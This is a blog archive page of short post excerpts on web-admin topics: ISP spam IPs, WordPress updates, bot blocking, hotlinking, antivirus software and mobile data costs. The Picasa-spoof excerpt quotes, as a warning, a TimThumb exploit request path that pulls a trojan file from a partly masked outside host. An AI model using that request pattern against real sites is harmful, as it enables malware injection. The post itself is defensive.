Blog Archives

Is MWEB a Spammers Haven?

MWEB IPs used by Spammers and Hackers

mweb spam ips icon

Checking an IP record for 41.133.8.155 after noticing a minor offence this morning – the ubiquitous and quite stupid practice of adding “/undefined” to the end of actual URLs – brought up a list of IPs in the neighbourhood. All the IP’s included below belong to MWEB. (whois.domaintools.com IP lookup records.)

MWEB, a South African Internet Service Provider, has previously had IP’s under their control listed in several databases as a source of spam e-mails. According to Project Honeypot  a range of IP’s managed by MWEB is (or was) used by Spammers and Dictionary Attackers.

Read the rest of this entry

Pansee Site Valuation – Rubbish

False Valuation by Pansee.com

pansee site valuation trashEver had a site valuation by pansee.com – I got sent a mail informing me ‘someone’ had conducted a valuation of my website graphicline.co.za using pansee.com valuation tools, with a link to the valuation report. Interested to see what the report contained, I checked if Google had any information about malware on the site, then visited the page.

The valuation report had some interesting data. From the country where most of the website traffic is derived from, to number of daily visitors. And a claim to the value of advertising on the front page.

France is the Biggest Source of Traffic

This amused me… According to pansee.com, 12.2 percent of my traffic comes from France, while the USA only accounts for 8.1%

Read the rest of this entry

WordPress 3.4 Version Released

Update to WordPress 3.4

WordPress 3.4 was released to the public a few days ago. WP 3.4 has been in Beta testing for quite some time, so most bugs should have been discovered and fixed by now – and so they are. The list of known issues is short (Troubleshooting WordPress 3.4 – Master List). More issues have been reported with the latest default theme wordpress 3.4 icon(TwentyEleven) version, and with the JetPack version update released at the same time than with WP 3.4 core.

Should we update our WordPress installations? Generally the answer is yes. It is always a good idea to keep WordPress up to date, however the update should be approached with a degree of caution. Some plugins may not work with the latest version of WP, some themes may also have problems. So before updating let’s consider a few things if the update causes problems, or even worse a broken site.

Read the rest of this entry

Markmonitor dotcom | Watchdog or What?

What is Markmonitor.com?

brandmark monitor iconMarkmonitor.com is a company providing brand protection to (mainly) global brands.

Markmonitor monitors the Internet (supposedly) looking for brand-piracy, domain name hijacking and counterfeiting (of branded goods) among it’s range of client services. The company must use search spiders to trawl websites looking for this information.

They also have another side of business, as  a domain registrar, and a number of large corporations including Apple.com have their domains under their ambit.

Read the rest of this entry

Go Away Baidu and Yandex

Baidu and Yandex Bots Forbidden Access

That’s it folk, I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, I don’t want them crawling my clients’ sites (unless the client wants them to of course). Both these bots do not follow advanced robots.txt disallow rules, and crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback urls thus generating excessive page not found errors.

I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, eg “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, any other worthwhile search engine should also obey these rules.

Read the rest of this entry

Image Hotlinking

Image Hotlink in Spam E-mail

Hotlink Warning SignSome “kind person” decided to generate lots of traffic to one of my websites yesterday, and used an image hosted on the website server in a spam e-mail, resulting in over 500 hits on the image file in four hours. After redirecting and blocking hotlinks to images there were another 600 hits on the hotlink redirect notification page Broken Image Links for a total of more than 1100 hits in twenty-four hours, and then changed to display a copy of the image on the right.

Hits from the spam mail reached a peak between 1:45 pm and 2:15 pm this afternoon (March 27) with more than 1400 hits before stabilisng at around 100 /hour. The peak probably co-incided with workers checking their mail after lunch.

Read the rest of this entry

Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

Microsoft Security Essentials LogoA look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?

Over the next few months we will see.

Annoyed with Commercial AV Software.

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.

Read the rest of this entry

Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to picasa spoof malwareinject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!

Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.

Read the rest of this entry

Mobile Data Crunch (and Costs)

Data Bundle Overload: End to Free Mobile Data

data bundlesIt looks like mobile data users at the Southern tip of Africa are not the only ones looking at paying high prices for data bundles (or buckets as they are known in some locales). The USA is joining the trend of charging for mobile data. Down South we have never known the privilege of free mobile data, having some of the highest data cost per GB in the world – at least when compared to first world civilisation.

The Data Crunch

The end of free mobile data is no real surprise. The RF frequencies used to carry this traffic are limited in capacity, new compression technology can only go so far to reduce the load on these channels. Urguably more frequencies could be made available, however these would have to be in higher frequency bands than are currently used. Increasing RF frequency brings it’s own problems – higher frequencies (into the  mid and high Ghz region) suffer more loss from inclement weather signal absorption from structures, components cost more, and we have to consider the human health related dangers of microwave radiation.

Read the rest of this entry

Changing WordPress Permalink Structure

change wordpress permalink structure

If you want to change the WordPress permalink structure of your blog or website there are a few things to consider first, and preparations to make before proceeding

The structure of Permalinks WordPress uses is easy to change; selecting a new option and clicking the radio button will take care of it for you. But what is the effect on SEO, what about all the links from other blogs and referrers?

You need to make sure search engines will still be able to find the content, and backlinks from the thousands (hopefully) of sites linking to yours will still send visitors to the correct page.

Here are a few guidelines that will reduce the loss of search engine ranking, and take care of the backlinks.

Read the rest of this entry